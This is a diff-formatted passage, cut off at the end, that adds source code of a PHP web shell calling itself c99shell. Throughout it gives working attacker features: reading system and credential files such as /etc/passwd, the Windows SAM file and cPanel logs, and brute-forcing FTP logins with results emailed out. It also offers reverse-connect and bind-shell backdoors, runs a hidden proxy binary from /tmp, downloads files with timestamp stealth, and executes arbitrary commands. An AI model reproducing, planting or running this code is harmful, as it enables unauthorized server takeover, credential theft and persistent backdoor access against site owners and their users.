+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Brute Forcer: </b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search file-system:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
